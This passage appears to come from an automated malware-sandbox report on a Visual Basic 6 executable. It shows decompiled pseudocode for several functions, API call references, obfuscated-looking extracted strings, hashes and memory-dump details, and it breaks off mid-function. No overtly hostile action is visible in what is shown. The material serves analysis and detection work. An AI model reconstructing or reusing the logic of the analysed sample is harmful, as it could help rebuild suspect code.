				char* _t200;
				signed int _t204;
				signed int _t208;
				char* _t212;
				signed int _t216;
				char* _t217;
				char* _t218;
				signed int _t221;
				intOrPtr _t252;
				intOrPtr _t262;
				void* _t265;
				signed int _t282;
				signed int _t283;

				_push(0x4015e6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t262;
				L004015E0();
				_v12 = _t262;
				_v8 = 0x401578;
				_push(8);
				_push(0x40f0ec);
				_push( &_v48);
				L00401868();
				if( *0x41b010 != 0) {
					_v148 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v148 = 0x41b010;
				}
				_t167 =  &_v60;
				L00401862();
				_v124 = _t167;
				_t170 =  *((intOrPtr*)( *_v124 + 0x1d8))(_v124, _t167,  *((intOrPtr*)( *((intOrPtr*)( *_v148)) + 0x348))( *_v148));
				asm("fclex");
				_v128 = _t170;
				if(_v128 >= 0) {
					_v152 = _v152 & 0x00000000;
				} else {
					_push(0x1d8);
					_push(0x40eac4);
					_push(_v124);
					_push(_v128);
					L00401856();
					_v152 = _t170;
				}
				L00401850();
				_v124 = _v124 & 0x00000000;
				if(_v124 >= 2) {
					L00401682();
					_v156 = _t170;
				} else {
					_v156 = _v156 & 0x00000000;
				}
				_t171 = _v124;
				L00401820();
				_v124 = 1;
				if(_v124 >= 2) {
					L00401682();
					_v160 = _t171;
				} else {
					_v160 = _v160 & 0x00000000;
				}
				L00401820();
				_v108 = _v108 & 0x00000000;
				_v116 = 8;
				L004017AE();
				_v120 =  &_v48;
				_v92 =  &_v120;
				_v100 = 0x6008;
				_push( &_v84);
				_t176 =  &_v100;
				_push(_t176);
				L0040167C();
				L00401814();
				_push(_t176);
				_push(0x40ee00);
				L00401772();
				asm("sbb eax, eax");
				_v124 =  ~( ~( ~_t176));
				L0040182C();
				L00401838();
				if(_v124 != 0) {
					if( *0x41b010 != 0) {
						_v164 = 0x41b010;
					} else {
						_push("p"w");
						_push(0x40f3cc);
						L0040185C();
						_v164 = 0x41b010;
					}
					_t204 =  &_v60;
					L00401862();
					_v124 = _t204;
					_t208 =  *((intOrPtr*)( *_v124 + 0x138))(_v124,  &_v120, _t204,  *((intOrPtr*)( *((intOrPtr*)( *_v164)) + 0x324))( *_v164));
					asm("fclex");
					_v128 = _t208;
					if(_v128 >= 0) {
						_v168 = _v168 & 0x00000000;
					} else {
						_push(0x138);
						_push(0x40eaf4);
						_push(_v124);
						_push(_v128);
						L00401856();
						_v168 = _t208;
					}
					if( *0x41b010 != 0) {
						_v172 = 0x41b010;
					} else {
						_push("p"w");
						_push(0x40f3cc);
						L0040185C();
						_v172 = 0x41b010;
					}
					_t252 =  *((intOrPtr*)( *_v172));
					_t212 =  &_v64;
					L00401862();
					_v132 = _t212;
					_t216 =  *((intOrPtr*)( *_v132 + 0x140))(_v132,  &_v68, _t212,  *((intOrPtr*)(_t252 + 0x30c))( *_v172));
					asm("fclex");
					_v136 = _t216;
					if(_v136 >= 0) {
						_v176 = _v176 & 0x00000000;
					} else {
						_push(0x140);
						_push(0x40ead4);
						_push(_v132);
						_push(_v136);
						L00401856();
						_v176 = _t216;
					}
					_t217 =  &_v84;
					L0040181A();
					_t265 = _t262 + 0x10;
					L0040172A();
					_v124 =  *0x40156c;
					_t282 =  *0x401568;
					_v128 = _t282;
					_t218 =  &_v84;
					L004017F6();
					_v180 = _t218;
					asm("fild dword [ebp-0xb0]");
					_v184 = _t282;
					_t283 = _v184;
					_v136 = _t283;
					asm("fild dword [ebp-0x74]");
					_v188 = _t283;
					_v140 = _v188;
					_t221 =  *((intOrPtr*)( *_a4 + 0x2c8))(_a4, 6, _t252, _t252, _t218, _t252, _t252, _t217, _t217, _v68, 0, 0);
					asm("fclex");
					_v140 = _t221;
					if(_v140 >= 0) {
						_v192 = _v192 & 0x00000000;
					} else {
						_push(0x2c8);
						_push(0x40e734);
						_push(_a4);
						_push(_v140);
						L00401856();
						_v192 = _t221;
					}
					_push( &_v68);
					_push( &_v64);
					_push( &_v60);
					_push(3);
					L00401826();
					_t262 = _t265 + 0x10;
					L00401838();
				}
				if( *0x41b010 != 0) {
					_v196 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v196 = 0x41b010;
				}
				_t184 =  &_v60;
				L00401862();
				_v124 = _t184;
				_t187 =  *((intOrPtr*)( *_v124 + 0x1c8))(_v124, _t184,  *((intOrPtr*)( *((intOrPtr*)( *_v196)) + 0x350))( *_v196));
				asm("fclex");
				_v128 = _t187;
				if(_v128 >= 0) {
					_v200 = _v200 & 0x00000000;
				} else {
					_push(0x1c8);
					_push(0x40eac4);
					_push(_v124);
					_push(_v128);
					L00401856();
					_v200 = _t187;
				}
				L00401850();
				if( *0x41b010 != 0) {
					_v204 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v204 = 0x41b010;
				}
				_t191 =  &_v60;
				L00401862();
				_v124 = _t191;
				_t195 =  *((intOrPtr*)( *_v124 + 0x58))(_v124,  &_v64, _t191,  *((intOrPtr*)( *((intOrPtr*)( *_v204)) + 0x354))( *_v204));
				asm("fclex");
				_v128 = _t195;
				if(_v128 >= 0) {
					_v208 = _v208 & 0x00000000;
				} else {
					_push(0x58);
					_push(0x40ec18);
					_push(_v124);
					_push(_v128);
					L00401856();
					_v208 = _t195;
				}
				_push(0);
				_push(0);
				_push(_v64);
				_t196 =  &_v84;
				_push(_t196);
				L0040181A();
				_push(_t196);
				L004017F6();
				_v24 = _t196;
				_push( &_v64);
				_push( &_v60);
				_push(2);
				L00401826();
				L00401838();
				asm("wait");
				_push(0x419616);
				_v120 =  &_v48;
				_t200 =  &_v120;
				_push(_t200);
				_push(0);
				L004017DE();
				return _t200;
			}

0x004190c8
0x004190d3
0x004190d4
0x004190e0
0x004190e8
0x004190eb
0x004190f2
0x004190f4
0x004190fc
0x004190fd
0x00419109
0x00419126
0x0041910b
0x0041910b
0x00419110
0x00419115
0x0041911a
0x0041911a
0x0041914a
0x0041914e
0x00419153
0x0041915e
0x00419164
0x00419166
0x0041916d
0x0041918c
0x0041916f
0x0041916f
0x00419174
0x00419179
0x0041917c
0x0041917f
0x00419184
0x00419184
0x00419196
0x0041919b
0x004191a3
0x004191ae
0x004191b3
0x004191a5
0x004191a5
0x004191a5
0x004191be
0x004191c7
0x004191cc
0x004191d7
0x004191e2
0x004191e7
0x004191d9
0x004191d9
0x004191d9
0x004191fb
0x00419200
0x00419204
0x00419211
0x00419219
0x0041921f
0x00419222
0x0041922c
0x0041922d
0x00419230
0x00419231
0x0041923b
0x00419240
0x00419241
0x00419246
0x0041924d
0x00419253
0x0041925a
0x00419262
0x0041926d
0x0041927a
0x00419297
0x0041927c
0x0041927c
0x00419281
0x00419286
0x0041928b
0x0041928b
0x004192bb
0x004192bf
0x004192c4
0x004192d3
0x004192d9
0x004192db
0x004192e2
0x00419301
0x004192e4
0x004192e4
0x004192e9
0x004192ee
0x004192f1
0x004192f4
0x004192f9
0x004192f9
0x0041930f
0x0041932c
0x00419311
0x00419311
0x00419316
0x0041931b
0x00419320
0x00419320
0x00419346
0x00419350
0x00419354
0x00419359
0x00419368
0x0041936e
0x00419370
0x0041937d
0x0041939f
0x0041937f
0x0041937f
0x00419384
0x00419389
0x0041938c
0x00419392
0x00419397
0x00419397
0x004193ad
0x004193b1
0x004193b6
0x004193bf
0x004193cc
0x004193cf
0x004193d6
0x004193d9
0x004193dd
0x004193e2
0x004193e8
0x004193ee
0x004193f4
0x004193fb
0x004193fe
0x00419401
0x0041940e
0x0041941b
0x00419421
0x00419423
0x00419430
0x00419452
0x00419432
0x00419432
0x00419437
0x0041943c
0x0041943f
0x00419445
0x0041944a
0x0041944a
0x0041945c
0x00419460
0x00419464
0x00419465
0x00419467
0x0041946c
0x00419472
0x00419472
0x0041947e
0x0041949b
0x00419480
0x00419480
0x00419485
0x0041948a
0x0041948f
0x0041948f
0x004194bf
0x004194c3
0x004194c8
0x004194d3
0x004194d9
0x004194db
0x004194e2
0x00419501
0x004194e4
0x004194e4
0x004194e9
0x004194ee
0x004194f1
0x004194f4
0x004194f9
0x004194f9
0x0041950b
0x00419517
0x00419534
0x00419519
0x00419519
0x0041951e
0x00419523
0x00419528
0x00419528
0x00419558
0x0041955c
0x00419561
0x00419570
0x00419573
0x00419575
0x0041957c
0x00419598
0x0041957e
0x0041957e
0x00419580
0x00419585
0x00419588
0x0041958b
0x00419590
0x00419590
0x0041959f
0x004195a1
0x004195a3
0x004195a6
0x004195a9
0x004195aa
0x004195b2
0x004195b3
0x004195b8
0x004195be
0x004195c2
0x004195c3
0x004195c5
0x004195d0
0x004195d5
0x004195d6
0x00419607
0x0041960a
0x0041960d
0x0041960e
0x00419610
0x00419615

APIs

__vbaChkstk.MSVBVM60(?,004015E6), ref: 004190E0
__vbaAryConstruct2.MSVBVM60(?,0040F0EC,00000008,?,?,?,?,004015E6), ref: 004190FD
__vbaNew2.MSVBVM60(0040F3CC,p"w,?,0040F0EC,00000008,?,?,?,?,004015E6), ref: 00419115
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041914E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EAC4,000001D8), ref: 0041917F
__vbaFreeObj.MSVBVM60(00000000,?,0040EAC4,000001D8), ref: 00419196
__vbaGenerateBoundsError.MSVBVM60 ref: 004191AE
__vbaStrCopy.MSVBVM60 ref: 004191C7
__vbaGenerateBoundsError.MSVBVM60 ref: 004191E2
__vbaStrCopy.MSVBVM60 ref: 004191FB
__vbaVarDup.MSVBVM60 ref: 00419211
#710.MSVBVM60(00006008,?), ref: 00419231
__vbaStrMove.MSVBVM60(00006008,?), ref: 0041923B
__vbaStrCmp.MSVBVM60(0040EE00,00000000,00006008,?), ref: 00419246
__vbaFreeStr.MSVBVM60(0040EE00,00000000,00006008,?), ref: 0041925A
__vbaFreeVar.MSVBVM60(0040EE00,00000000,00006008,?), ref: 00419262
__vbaNew2.MSVBVM60(0040F3CC,p"w,0040EE00,00000000,00006008,?), ref: 00419286
__vbaObjSet.MSVBVM60(?,00000000), ref: 004192BF
__vbaHresultCheckObj.MSVBVM60(00000000,00000002,0040EAF4,00000138), ref: 004192F4
__vbaNew2.MSVBVM60(0040F3CC,p"w), ref: 0041931B
__vbaObjSet.MSVBVM60(?,00000000), ref: 00419354
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EAD4,00000140), ref: 00419392
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 004193B1
__vbaFpI4.MSVBVM60 ref: 004193BF
__vbaI4Var.MSVBVM60(?,?,?,00000000), ref: 004193DD
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040E734,000002C8), ref: 00419445
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 00419467
__vbaFreeVar.MSVBVM60(?,?,?,00000000), ref: 00419472
__vbaNew2.MSVBVM60(0040F3CC,p"w,0040EE00,00000000,00006008,?), ref: 0041948A
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,0040EE00,00000000,00006008,?), ref: 004194C3
__vbaHresultCheckObj.MSVBVM60(00000000,00000002,0040EAC4,000001C8,?,?,?,?,?,?,?,?,0040EE00,00000000,00006008,?), ref: 004194F4
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,0040EE00,00000000,00006008,?), ref: 0041950B
__vbaNew2.MSVBVM60(0040F3CC,p"w,?,?,?,?,?,?,?,?,0040EE00,00000000,00006008,?), ref: 00419523
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,0040EE00,00000000,00006008,?), ref: 0041955C
__vbaHresultCheckObj.MSVBVM60(00000000,00000002,0040EC18,00000058,?,?,?,?,?,?,?,?,?,?,0040EE00,00000000), ref: 0041958B
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,0040EE00,00000000), ref: 004195AA
__vbaI4Var.MSVBVM60(00000000), ref: 004195B3
__vbaFreeObjList.MSVBVM60(00000002,?,?,00000000), ref: 004195C5
__vbaFreeVar.MSVBVM60(?,?,00000000), ref: 004195D0
__vbaAryDestruct.MSVBVM60(00000000,?,00419616,?,?,00000000), ref: 00419610

Strings

p"w, xrefs: 00419102, 0041910B, 0041911A, 00419126, 00419273, 0041927C, 0041928B, 00419297, 00419308, 00419311, 00419320, 0041932C, 00419477, 00419480, 0041948F, 0041949B, 00419510, 00419519, 00419528, 00419534

Memory Dump Source

Source File: 00000000.00000002.798451471.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.798447801.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.798475805.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.798480170.000000000041C000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$New2$BoundsCallCopyErrorGenerateLateList$#710ChkstkConstruct2DestructMove
String ID: p"w
API String ID: 1224860254-3261273085
Opcode ID: c9391482e34fa0c98069d4ae9a4d07db96845a585f213a7067fbbc99dfdc420b
Instruction ID: 9e3405092a933aab6434dcb7374d0d96ac0835f2aceb2605e95f5ca7e31e361b
Opcode Fuzzy Hash: c9391482e34fa0c98069d4ae9a4d07db96845a585f213a7067fbbc99dfdc420b
Instruction Fuzzy Hash: FCF10771900218EFDB20EFA1C845BDDBBB5FB08304F2045AEE019B72A1DB795A85DF59

Uniqueness

Uniqueness Score: -1.00%

Function 00414E73, Relevance: 65.1, APIs: 34, Strings: 3, Instructions: 344
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E00414E73(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v36;
				char _v40;
				char _v44;
				intOrPtr _v52;
				char _v60;
				char _v76;
				intOrPtr _v100;
				intOrPtr _v108;
				char _v116;
				char _v124;
				char _v144;
				void* _v148;
				signed int _v152;
				intOrPtr* _v156;
				signed int _v160;
				signed int _v172;
				intOrPtr* _v176;
				signed int _v180;
				intOrPtr* _v184;
				signed int _v188;
				intOrPtr* _v192;
				intOrPtr* _v196;
				signed int _v200;
				signed int _v204;
				intOrPtr* _v208;
				signed int _v212;
				intOrPtr* _v216;
				signed int _v220;
				short _t163;
				char* _t170;
				char* _t174;
				signed int _t178;
				signed int _t182;
				char* _t188;
				signed int _t191;
				char* _t195;
				signed int _t199;
				intOrPtr _t200;
				char* _t204;
				signed int _t208;
				char* _t214;
				signed int _t218;
				void* _t258;
				void* _t260;
				intOrPtr _t261;
				void* _t262;

				_t261 = _t260 - 0xc;
				 *[fs:0x0] = _t261;
				L004015E0();
				_v16 = _t261;
				_v12 = 0x401368;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4015e6, _t258);
				_v100 = 0x40ed48;
				_v108 = 8;
				L004017AE();
				_push( &_v60);
				_push( &_v76);
				L0040178A();
				_v116 = 0x40ed54;
				_v124 = 0x8008;
				_push( &_v76);
				_t163 =  &_v124;
				_push(_t163);
				L00401796();
				_v148 = _t163;
				_push( &_v76);
				_push( &_v60);
				_push(2);
				L004017BA();
				_t262 = _t261 + 0xc;
				if(_v148 != 0) {
					if( *0x41b010 != 0) {
						_v176 = 0x41b010;
					} else {
						_push("p"w");
						_push(0x40f3cc);
						L0040185C();
						_v176 = 0x41b010;
					}
					_t204 =  &_v40;
					L00401862();
					_v148 = _t204;
					_t208 =  *((intOrPtr*)( *_v148 + 0x48))(_v148,  &_v36, _t204,  *((intOrPtr*)( *((intOrPtr*)( *_v176)) + 0x33c))( *_v176));
					asm("fclex");
					_v152 = _t208;
					if(_v152 >= 0) {
						_v180 = _v180 & 0x00000000;
					} else {
						_push(0x48);
						_push(0x40ea64);
						_push(_v148);
						_push(_v152);
						L00401856();
						_v180 = _t208;
					}
					_v172 = _v36;
					_v36 = _v36 & 0x00000000;
					_v52 = _v172;
					_v60 = 8;
					if( *0x41b010 != 0) {
						_v184 = 0x41b010;
					} else {
						_push("p"w");
						_push(0x40f3cc);
						L0040185C();
						_v184 = 0x41b010;
					}
					_t214 =  &_v44;
					L00401862();
					_v156 = _t214;
					_t218 =  *((intOrPtr*)( *_v156 + 0x1a0))(_v156,  &_v144, _t214,  *((intOrPtr*)( *((intOrPtr*)( *_v184)) + 0x318))( *_v184));
					asm("fclex");
					_v160 = _t218;
					if(_v160 >= 0) {
						_v188 = _v188 & 0x00000000;
					} else {
						_push(0x1a0);
						_push(0x40ea8c);
						_push(_v156);
						_push(_v160);
						L00401856();
						_v188 = _t218;
					}
					_v116 = _v144;
					_v124 = 3;
					_push(0x10);
					L004015E0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0x10);
					L004015E0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(2);
					_push(L"M1um4snmnNQMSiEIlp1K1f8GD15");
					_push(_v28);
					L00401784();
					_push( &_v44);
					_push( &_v40);
					_push(2);
					L00401826();
					_t262 = _t262 + 0x38;
					L00401838();
				}
				if( *0x41b010 != 0) {
					_v192 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v192 = 0x41b010;
				}
				_push( *((intOrPtr*)( *((intOrPtr*)( *_v192)) + 0x318))( *_v192));
				_t170 =  &_v44;
				_push(_t170);
				L00401862();
				_v156 = _t170;
				_v100 = 0x80020004;
				_v108 = 0xa;
				if( *0x41b010 != 0) {
					_v196 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v196 = 0x41b010;
				}
				_t174 =  &_v40;
				L00401862();
				_v148 = _t174;
				_t178 =  *((intOrPtr*)( *_v148 + 0x50))(_v148,  &_v36, _t174,  *((intOrPtr*)( *((intOrPtr*)( *_v196)) + 0x34c))( *_v196));
				asm("fclex");
				_v152 = _t178;
				if(_v152 >= 0) {
					_v200 = _v200 & 0x00000000;
				} else {
					_push(0x50);
					_push(0x40eac4);
					_push(_v148);
					_push(_v152);
					L00401856();
					_v200 = _t178;
				}
				L004015E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t182 =  *((intOrPtr*)( *_v156 + 0x1ec))(_v156, _v36, 0x10);
				asm("fclex");
				_v160 = _t182;
				if(_v160 >= 0) {
					_v204 = _v204 & 0x00000000;
				} else {
					_push(0x1ec);
					_push(0x40ea8c);
					_push(_v156);
					_push(_v160);
					L00401856();
					_v204 = _t182;
				}
				L0040182C();
				_push( &_v44);
				_push( &_v40);
				_push(2);
				L00401826();
				if( *0x41b010 != 0) {
					_v208 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v208 = 0x41b010;
				}
				_t188 =  &_v40;
				L00401862();
				_v148 = _t188;
				_t191 =  *((intOrPtr*)( *_v148 + 0x170))(_v148, _t188,  *((intOrPtr*)( *((intOrPtr*)( *_v208)) + 0x2fc))( *_v208));
				asm("fclex");
				_v152 = _t191;
				if(_v152 >= 0) {
					_v212 = _v212 & 0x00000000;
				} else {
					_push(0x170);
					_push(0x40eae4);
					_push(_v148);
					_push(_v152);
					L00401856();
					_v212 = _t191;
				}
				L00401850();
				if( *0x41b010 != 0) {
					_v216 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v216 = 0x41b010;
				}
				_t195 =  &_v40;
				L00401862();
				_v148 = _t195;
				_t199 =  *((intOrPtr*)( *_v148 + 0x60))(_v148,  &_v144, _t195,  *((intOrPtr*)( *((intOrPtr*)( *_v216)) + 0x338))( *_v216));
				asm("fclex");
				_v152 = _t199;
				if(_v152 >= 0) {
					_v220 = _v220 & 0x00000000;
				} else {
					_push(0x60);
					_push(0x40eae4);
					_push(_v148);
					_push(_v152);
					L00401856();
					_v220 = _t199;
				}
				_t200 = _v144;
				_v32 = _t200;
				L00401850();
				_push(0x415417);
				L00401850();
				return _t200;
			}

0x00414e76
0x00414e85
0x00414e91
0x00414e99
0x00414e9c
0x00414ea3
0x00414eb2
0x00414eb5
0x00414ebc
0x00414ec9
0x00414ed1
0x00414ed5
0x00414ed6
0x00414edb
0x00414ee2
0x00414eec
0x00414eed
0x00414ef0
0x00414ef1
0x00414ef6
0x00414f00
0x00414f04
0x00414f05
0x00414f07
0x00414f0c
0x00414f18
0x00414f25
0x00414f42
0x00414f27
0x00414f27
0x00414f2c
0x00414f31
0x00414f36
0x00414f36
0x00414f66
0x00414f6a
0x00414f6f
0x00414f87
0x00414f8a
0x00414f8c
0x00414f99
0x00414fbb
0x00414f9b
0x00414f9b
0x00414f9d
0x00414fa2
0x00414fa8
0x00414fae
0x00414fb3
0x00414fb3
0x00414fc5
0x00414fcb
0x00414fd5
0x00414fd8
0x00414fe6
0x00415003
0x00414fe8
0x00414fe8
0x00414fed
0x00414ff2
0x00414ff7
0x00414ff7
0x00415027
0x0041502b
0x00415030
0x0041504b
0x00415051
0x00415053
0x00415060
0x00415085
0x00415062
0x00415062
0x00415067
0x0041506c
0x00415072
0x00415078
0x0041507d
0x0041507d
0x00415092
0x00415095
0x0041509c
0x0041509f
0x004150a9
0x004150aa
0x004150ab
0x004150ac
0x004150ad
0x004150b0
0x004150ba
0x004150bb
0x004150bc
0x004150bd
0x004150be
0x004150c0
0x004150c5
0x004150c8
0x004150d3
0x004150d7
0x004150d8
0x004150da
0x004150df
0x004150e5
0x004150e5
0x004150f1
0x0041510e
0x004150f3
0x004150f3
0x004150f8
0x004150fd
0x00415102
0x00415102
0x00415131
0x00415132
0x00415135
0x00415136
0x0041513b
0x00415141
0x00415148
0x00415156
0x00415173
0x00415158
0x00415158
0x0041515d
0x00415162
0x00415167
0x00415167
0x00415197
0x0041519b
0x004151a0
0x004151b8
0x004151bb
0x004151bd
0x004151ca
0x004151ec
0x004151cc
0x004151cc
0x004151ce
0x004151d3
0x004151d9
0x004151df
0x004151e4
0x004151e4
0x004151f6
0x00415200
0x00415201
0x00415202
0x00415203
0x00415215
0x0041521b
0x0041521d
0x0041522a
0x0041524f
0x0041522c
0x0041522c
0x00415231
0x00415236
0x0041523c
0x00415242
0x00415247
0x00415247
0x00415259
0x00415261
0x00415265
0x00415266
0x00415268
0x00415277
0x00415294
0x00415279
0x00415279
0x0041527e
0x00415283
0x00415288
0x00415288
0x004152b8
0x004152bc
0x004152c1
0x004152d5
0x004152db
0x004152dd
0x004152ea
0x0041530f
0x004152ec
0x004152ec
0x004152f1
0x004152f6
0x004152fc
0x00415302
0x00415307
0x00415307
0x00415319
0x00415325
0x00415342
0x00415327
0x00415327
0x0041532c
0x00415331
0x00415336
0x00415336
0x00415366
0x0041536a
0x0041536f
0x0041538a
0x0041538d
0x0041538f
0x0041539c
0x004153be
0x0041539e
0x0041539e
0x004153a0
0x004153a5
0x004153ab
0x004153b1
0x004153b6
0x004153b6
0x004153c5
0x004153cb
0x004153d1
0x004153d6
0x00415411
0x00415416

APIs

__vbaChkstk.MSVBVM60(?,004015E6), ref: 00414E91
__vbaVarDup.MSVBVM60 ref: 00414EC9
#520.MSVBVM60(?,?), ref: 00414ED6
__vbaVarTstNe.MSVBVM60(00008008,?,?,?,?,?), ref: 00414EF1
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008008,?,?,?,?,?), ref: 00414F07
__vbaNew2.MSVBVM60(0040F3CC,p"w,?,?,004015E6), ref: 00414F31
__vbaObjSet.MSVBVM60(?,00000000), ref: 00414F6A
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EA64,00000048), ref: 00414FAE
__vbaNew2.MSVBVM60(0040F3CC,p"w), ref: 00414FF2
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041502B
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EA8C,000001A0), ref: 00415078
__vbaChkstk.MSVBVM60(00000000,?,0040EA8C,000001A0), ref: 0041509F
__vbaChkstk.MSVBVM60(00000000,?,0040EA8C,000001A0), ref: 004150B0
__vbaLateMemCall.MSVBVM60(?,M1um4snmnNQMSiEIlp1K1f8GD15,00000002), ref: 004150C8
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 004150DA
__vbaFreeVar.MSVBVM60 ref: 004150E5
__vbaNew2.MSVBVM60(0040F3CC,p"w,?,?,004015E6), ref: 004150FD
__vbaObjSet.MSVBVM60(?,00000000), ref: 00415136
__vbaNew2.MSVBVM60(0040F3CC,p"w,?,00000000), ref: 00415162
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041519B
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EAC4,00000050), ref: 004151DF
__vbaChkstk.MSVBVM60(00000000,?,0040EAC4,00000050), ref: 004151F6
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EA8C,000001EC), ref: 00415242
__vbaFreeStr.MSVBVM60(00000000,?,0040EA8C,000001EC), ref: 00415259
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00415268
__vbaNew2.MSVBVM60(0040F3CC,p"w,?,?,?,?,?,004015E6), ref: 00415283
__vbaObjSet.MSVBVM60(?,00000000), ref: 004152BC
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EAE4,00000170), ref: 00415302
__vbaFreeObj.MSVBVM60(00000000,?,0040EAE4,00000170), ref: 00415319
__vbaNew2.MSVBVM60(0040F3CC,p"w), ref: 00415331
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041536A
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040EAE4,00000060), ref: 004153B1
__vbaFreeObj.MSVBVM60(00000000,?,0040EAE4,00000060), ref: 004153D1
__vbaFreeObj.MSVBVM60(00415417), ref: 00415411

Strings

tt, xrefs: 00414EB5
M1um4snmnNQMSiEIlp1K1f8GD15, xrefs: 004150C0
p"w, xrefs: 00414F1E, 00414F27, 00414F36, 00414F42, 00414FDF, 00414FE8, 00414FF7, 00415003, 004150EA, 004150F3, 00415102, 0041510E, 0041514F, 00415158, 00415167, 00415173, 00415270, 00415279, 00415288, 00415294, 0041531E, 00415327, 00415336, 00415342

Memory Dump Source

Source File: 00000000.00000002.798451471.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.798447801.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.798475805.000000000041B000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.798480170.000000000041C000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultNew2$Chkstk$List$#520CallLate
String ID: tt$M1um4snmnNQMSiEIlp1K1f8GD15$p"w
API String ID: 2677338541-2431143552
Opcode ID: ed3391e94f7ce8164a89c9ef69e40b6ace6cca78ba3632f81bda20c216c49618
Instruction ID: 9d819eb022b7cac104bd63613e12d73719ce807222090bcb270a86790ca37d78
Opcode Fuzzy Hash: ed3391e94f7ce8164a89c9ef69e40b6ace6cca78ba3632f81bda20c216c49618
Instruction Fuzzy Hash: 21F1E471A00218DFDB20EFA0CC45BDDBBB5FB08304F1044AAE509BB2A1D7795A85DF59

Uniqueness

Uniqueness Score: -1.00%

Function 00417106, Relevance: 58.1, APIs: 31, Strings: 2, Instructions: 325
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00417106(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a28) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				intOrPtr _v32;
				void* _v36;
				char _v40;
				char _v44;
				signed int _v52;
				intOrPtr _v60;
				char _v64;
				char _v68;
				void* _v72;
				signed int _v76;
				intOrPtr* _v80;
				signed char _v84;
				signed int _v88;
				intOrPtr* _v100;
				signed int _v104;
				intOrPtr* _v108;
				signed int _v112;
				intOrPtr* _v116;
				signed char _v120;
				signed long long _v124;
				char _v128;
				signed int _v132;
				signed int _v136;
				void* _v140;
				signed int _v144;
				intOrPtr* _v148;
				signed int _v152;
				char* _t142;
				signed int _t146;
				char* _t154;
				signed int _t158;
				char* _t162;
				signed int _t166;
				char* _t170;
				signed int _t174;
				char* _t178;
				signed char _t182;
				signed int _t186;
				intOrPtr _t211;
				void* _t220;
				void* _t222;
				intOrPtr _t223;
				signed long long _t228;
				signed int _t232;
				void* _t233;

				_t223 = _t222 - 0xc;
				 *[fs:0x0] = _t223;
				L004015E0();
				_v16 = _t223;
				_v12 = 0x4014c0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4015e6, _t220);
				L00401820();
				if( *0x41b010 != 0) {
					_v100 = 0x41b010;
				} else {
					_push("p"w");
					_push(0x40f3cc);
					L0040185C();
					_v100 = 0x41b010;
				}
				_t142 =  &_v40;
				L00401862();
				_v72 = _t142;
				_v52 = 0x80020004;
				_v60 = 0xa;
				L004015E0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t146 =  *((intOrPtr*)( *_v72 + 0x174))(_v72, 0x10, _t142,  *((intOrPtr*)( *((intOrPtr*)( *_v100)) + 0x2fc))( *_v100));
				asm("fclex");
				_v76 = _t146;
				if(_v76 >= 0) {
					_v104 = _v104 & 0x00000000;
				} else {
					_push(0x174);
					_push(0x40eae4);
					_push(_v72);
					_push(_v76);
					L00401856();
					_v104 = _t146;
				}
				L00401850();
				_push(" tt");
				L004016C4();
				L00401814();
				_push(_t146);
				_push(0x40ed54);
				L00401772();
				asm("sbb eax, eax");
				_v72 =  ~( ~( ~_t146));
				L0040182C();
				if(_v72 != 0) {
					if( *0x41b010 != 0) {
						_v108 = 0x41b010;
					} else {
						_push("p"w");
